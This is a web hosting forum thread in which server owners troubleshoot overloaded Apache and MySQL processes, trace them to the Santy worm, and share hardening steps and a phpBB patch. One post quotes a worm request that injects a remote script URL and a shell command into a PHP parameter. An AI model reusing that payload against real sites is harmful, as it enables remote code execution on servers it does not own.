Am I being Hacked (DDOSED)!!

Aziz

Verified User
Joined
Oct 4, 2004
Messages
125
Well, it just started two days ago that my mysql is starting to have too many connections and when I open my control panel I see a whole punch of PID's running (which I have to stop,start to get it working again)... also the Apache is the same..

I think I am being DDOS attacked?

What do you think?

Peace,
 
Aziz said:
Well, it just started two days ago that my mysql is starting to have too many connections and when I open my control panel I see a whole punch of PID's running (which I have to stop,start to get it working again)... also the Apache is the same..

I think I am being DDOS attacked?

What do you think?

Peace,
Can you give more info?
how many mysql PIDs? 100? 200? 300?
what sites you have online?
how many databases?
You have any BW tool so you can use the real BW usage of the server?
How is the CPU load?
What OS you use?
What specs of the server?

Please provide more details (as more as you can) so i can provide you a better answer.
 
Re: Re: Am I being Hacked (DDOSED)!!

blueice said:
Can you give more info?
how many mysql PIDs? 100? 200? 300?

I would say around 100.... but they always seem to increase and never decrease?!
Although this started two days ago (after an argument between me and some members in some web hosting forum)..

blueice said:

what sites you have online?

Well, many : free-php-scripts.net, sonimager.com and goldmohamed.com are the ones that use databases much... but there is absolutly no change since the last month with these sites.

blueice said:

how many databases?

Around 10.... but only around 3-4 that are really active... Again no change in the last month or so..

blueice said:

You have any BW tool so you can use the real BW usage of the server?

BW Usage is 6.5 GB since the begining of the month (normal)

blueice said:

How is the CPU load?
Do not know how to get that, but space is steady at 1.1 GB.

blueice said:

What OS you use?
Fedora Project.

blueice said:

What specs of the server?

Intel 1.7 GHz CPU
512 MB RAM
80 GB HD
1000 GB Data Transfer


I would appreciate any help...

Apache Log File: (3.3 MB)
http://www.azizsaleh.com/log.txt

Thanks for any help,

Peace,
 
Hi Aziz,

We talked on WHT before :) Anyway. To get the CPU load, you can login at SSH, and issue this :

uptime

That shoudl something like this >
04:52:07 up 237 days, 15:18, 1 user, load average: 0.14, 0.43, 0.37

The three numbers represent a value that is considered the load on the system. They represent different times over which the average is done. For your specs, I would think a load of 2.0 would be no problem as the maximum.

anythign below 1.0 - should be considered very good. The lower it is, obviously the better it is.

Do you have a firewall installed ? Is it running ? Are you giving your users SSH access ? Can you post the results of

TOP
 
The same is happening to me. Too many pids for both Apache and MySQL. I get errors on sites running PHP and MySQL, from too many connections (when there are only a couple), and when trying to log into squirrelmail, I get
Fatal error: session_start(): Failed to initialize storage module: user (path: /tmp) in /var/www/html/squirrelmail-1.4.2/functions/global.php on line 295

All sites running PHP and MySQL are extremely slow!

I've tried a reboot, but it doesn't solve the problem.

Could it be the security vulnerability in PHP? I haven't patched mine yet...
 
Apache and MySQL have around 80 pids running each.

What can I do to solve this?
 
Oddly, we seem to be getting this on our server too. Has someone made a new server hack?

It appears to have started around midnight on Saturday morning. Over time the load and traffic get higher and higher and higher until we reboot the server. It's quiet for a while, but then starts again.

Rowan.
 
Being on vacation doesn't stop DA... they released the fix for php vulnerabilities long before the Christmas holiday. It's explained in the other thread
 
Anyone know how to stop the Santy worm from trying to execute the following on my PHP scripts:
/index.php?cPath=http://www.visualcoders.net/spy.gif?&cmd=cd%20/
?

This is just an example of what is happening. It distorts the PHP Sessions.
 
change the perms on wget to 700. Then go clean up the mess. it took me about an hour to kick the script-kiddies off of a server.

Also, if you are running a redhat derivative, seriously look at running Bastille on it. (search freshmeat.net)

HTH,

=C=
 
Thanks! Wget will be chmod 700. Don't need it for anything else than for root.

Apparently I could add
PHP:
'php_value session.save_handler "files"'
to my config file, and it should solve some of the problem. Anyone know which config file?
 
Apparently I could add
PHP:
'php_value session.save_handler "files"'
to my config file, and it should solve some of the problem. Anyone know which config file?

Well, that looks like something you would add to httpd.conf to configure php. Two things though:

1) I'd modify php.ini directly if I were you. The only time I add php_value to an apache config file is when I'm changing something for a specific customer.

2) I really don't see how that's going to help much. That's the default value. grep /usr/local/lib/php.ini for save_handler. It should already say files unless you've implemented a custom session handler.

HTH,
=C=
 
Just a tip here , same type of problems here , apache processes out of control till the server dies of heavy load. All coming from earlier phpbb boards . upgrade your boards to 2.0.11 as a quick fix to buy some time, this might help :


Open viewtopic.php in any text editor. Find the following section of code:
//
// Was a highlight request part of the URI?
//
$highlight_match = $highlight = '';
if (isset($HTTP_GET_VARS['highlight']))
{
// Split words and phrases
$words = explode(' ', trim(htmlspecialchars(urldecode($HTTP_GET_VARS['highlight']))));

for($i = 0; $i < sizeof($words); $i++)
{

and replace with:
//
// Was a highlight request part of the URI?
//
$highlight_match = $highlight = '';
if (isset($HTTP_GET_VARS['highlight']))
{
// Split words and phrases
$words = explode(' ', trim(htmlspecialchars($HTTP_GET_VARS['highlight'])));

for($i = 0; $i < sizeof($words); $i++)
{
 
Back
Top